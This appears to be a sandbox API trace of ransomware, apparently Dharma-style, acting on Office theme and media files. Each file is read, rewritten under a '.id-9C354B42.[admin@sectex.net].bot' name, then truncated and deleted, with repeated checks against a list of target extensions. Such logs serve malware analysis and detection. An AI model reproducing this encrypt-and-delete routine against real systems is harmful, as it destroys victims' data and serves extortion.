	[0142.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.162] GetLastError () returned 0x0
	[0142.162] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x37d8a, lpOverlapped=0x0) returned 1
	[0142.171] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x37d90, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x37d90, lpOverlapped=0x0) returned 1
	[0142.175] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.176] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0142.176] SetEndOfFile (hFile=0x398) returned 1
	[0142.176] CloseHandle (hObject=0x398) returned 1
	[0142.180] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.180] SetEndOfFile (hFile=0x3b8) returned 1
	[0142.478] CloseHandle (hObject=0x3b8) returned 1
	[0142.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx")) returned 1
	[0142.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.530] lstrlenW (lpString=".doc") returned 4
	[0142.530] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.530] lstrlenW (lpString=".docx") returned 5
	[0142.530] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.530] lstrlenW (lpString=".pdf") returned 4
	[0142.530] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.530] lstrlenW (lpString=".xls") returned 4
	[0142.530] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.530] lstrlenW (lpString=".xlsx") returned 5
	[0142.530] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.530] lstrlenW (lpString=".ppt") returned 4
	[0142.530] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.530] lstrlenW (lpString=".zip") returned 4
	[0142.531] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString=".rar") returned 4
	[0142.531] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString=".bz2") returned 4
	[0142.531] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString=".7z") returned 3
	[0142.531] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.531] lstrlenW (lpString=".dbf") returned 4
	[0142.531] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.531] lstrlenW (lpString=".1cd") returned 4
	[0142.531] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.531] lstrlenW (lpString=".jpg") returned 4
	[0142.531] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.531] lstrlenW (lpString=".doc") returned 4
	[0142.531] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString=".docx") returned 5
	[0142.531] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.531] lstrlenW (lpString=".pdf") returned 4
	[0142.531] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString=".xls") returned 4
	[0142.531] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString=".xlsx") returned 5
	[0142.531] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.531] lstrlenW (lpString=".ppt") returned 4
	[0142.531] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.531] lstrlenW (lpString=".zip") returned 4
	[0142.531] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.531] lstrlenW (lpString=".rar") returned 4
	[0142.532] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.532] lstrlenW (lpString=".bz2") returned 4
	[0142.532] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.532] lstrlenW (lpString=".7z") returned 3
	[0142.532] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.532] lstrlenW (lpString=".dbf") returned 4
	[0142.532] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.532] lstrlenW (lpString=".1cd") returned 4
	[0142.532] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77
	[0142.532] lstrlenW (lpString=".jpg") returned 4
	[0142.532] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.532] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.532] lstrlenW (lpString="Verve.eftx") returned 10
	[0142.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.583] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=31224) returned 1
	[0142.583] CloseHandle (hObject=0x3a0) returned 1
	[0142.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx")) returned 0x20
	[0142.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.584] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.584] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.585] GetLastError () returned 0x0
	[0142.585] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x79f8, lpOverlapped=0x0) returned 1
	[0142.592] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x7a00, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x7a00, lpOverlapped=0x0) returned 1
	[0142.593] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.593] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0142.593] SetEndOfFile (hFile=0x3c4) returned 1
	[0142.594] CloseHandle (hObject=0x3c4) returned 1
	[0142.594] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.594] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.597] CloseHandle (hObject=0x3a0) returned 1
	[0142.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.622] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx")) returned 1
	[0142.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.622] lstrlenW (lpString=".doc") returned 4
	[0142.622] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.622] lstrlenW (lpString=".docx") returned 5
	[0142.622] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.622] lstrlenW (lpString=".pdf") returned 4
	[0142.622] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.622] lstrlenW (lpString=".xls") returned 4
	[0142.623] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString=".xlsx") returned 5
	[0142.623] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.623] lstrlenW (lpString=".ppt") returned 4
	[0142.623] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.623] lstrlenW (lpString=".zip") returned 4
	[0142.623] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString=".rar") returned 4
	[0142.623] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString=".bz2") returned 4
	[0142.623] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString=".7z") returned 3
	[0142.623] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.623] lstrlenW (lpString=".dbf") returned 4
	[0142.623] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.623] lstrlenW (lpString=".1cd") returned 4
	[0142.623] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.623] lstrlenW (lpString=".jpg") returned 4
	[0142.623] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.623] lstrlenW (lpString=".doc") returned 4
	[0142.623] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString=".docx") returned 5
	[0142.623] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.623] lstrlenW (lpString=".pdf") returned 4
	[0142.623] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.623] lstrlenW (lpString=".xls") returned 4
	[0142.624] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.624] lstrlenW (lpString=".xlsx") returned 5
	[0142.624] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.624] lstrlenW (lpString=".ppt") returned 4
	[0142.624] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.624] lstrlenW (lpString=".zip") returned 4
	[0142.624] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.624] lstrlenW (lpString=".rar") returned 4
	[0142.624] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.624] lstrlenW (lpString=".bz2") returned 4
	[0142.624] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.624] lstrlenW (lpString=".7z") returned 3
	[0142.624] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.624] lstrlenW (lpString=".dbf") returned 4
	[0142.624] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.624] lstrlenW (lpString=".1cd") returned 4
	[0142.624] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77
	[0142.624] lstrlenW (lpString=".jpg") returned 4
	[0142.624] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.624] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.624] lstrlenW (lpString="Waveform.eftx") returned 13
	[0142.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0142.631] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=112504) returned 1
	[0142.631] CloseHandle (hObject=0x3ac) returned 1
	[0142.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 0x20
	[0142.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0142.631] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.631] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.639] GetLastError () returned 0x0
	[0142.639] ReadFile (in: hFile=0x3ac, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x1b778, lpOverlapped=0x0) returned 1
	[0142.796] WriteFile (in: hFile=0x384, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1b780, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1b780, lpOverlapped=0x0) returned 1
	[0142.814] ReadFile (in: hFile=0x3ac, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.814] WriteFile (in: hFile=0x384, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0142.814] SetEndOfFile (hFile=0x384) returned 1
	[0142.814] CloseHandle (hObject=0x384) returned 1
	[0142.815] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.815] SetEndOfFile (hFile=0x3ac) returned 1
	[0142.818] CloseHandle (hObject=0x3ac) returned 1
	[0142.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.819] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 1
	[0142.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.819] lstrlenW (lpString=".doc") returned 4
	[0142.819] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.819] lstrlenW (lpString=".docx") returned 5
	[0142.819] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.819] lstrlenW (lpString=".pdf") returned 4
	[0142.819] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.819] lstrlenW (lpString=".xls") returned 4
	[0142.819] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.819] lstrlenW (lpString=".xlsx") returned 5
	[0142.819] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.819] lstrlenW (lpString=".ppt") returned 4
	[0142.819] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.820] lstrlenW (lpString=".zip") returned 4
	[0142.820] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString=".rar") returned 4
	[0142.820] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString=".bz2") returned 4
	[0142.820] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString=".7z") returned 3
	[0142.820] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.820] lstrlenW (lpString=".dbf") returned 4
	[0142.820] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.820] lstrlenW (lpString=".1cd") returned 4
	[0142.820] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.820] lstrlenW (lpString=".jpg") returned 4
	[0142.820] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.820] lstrlenW (lpString=".doc") returned 4
	[0142.820] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString=".docx") returned 5
	[0142.820] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.820] lstrlenW (lpString=".pdf") returned 4
	[0142.820] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString=".xls") returned 4
	[0142.820] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString=".xlsx") returned 5
	[0142.820] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.820] lstrlenW (lpString=".ppt") returned 4
	[0142.820] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.820] lstrlenW (lpString=".zip") returned 4
	[0142.821] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.821] lstrlenW (lpString=".rar") returned 4
	[0142.821] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.821] lstrlenW (lpString=".bz2") returned 4
	[0142.821] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.821] lstrlenW (lpString=".7z") returned 3
	[0142.821] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.821] lstrlenW (lpString=".dbf") returned 4
	[0142.821] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.821] lstrlenW (lpString=".1cd") returned 4
	[0142.821] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80
	[0142.821] lstrlenW (lpString=".jpg") returned 4
	[0142.821] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.821] lstrcmpiW (lpString1=".MML", lpString2=".bot") returned 1
	[0142.821] lstrlenW (lpString="OFFICE10.MML") returned 12
	[0142.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.944] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=312376) returned 1
	[0142.944] CloseHandle (hObject=0x3a8) returned 1
	[0142.945] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml")) returned 0x20
	[0142.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0142.949] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.949] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
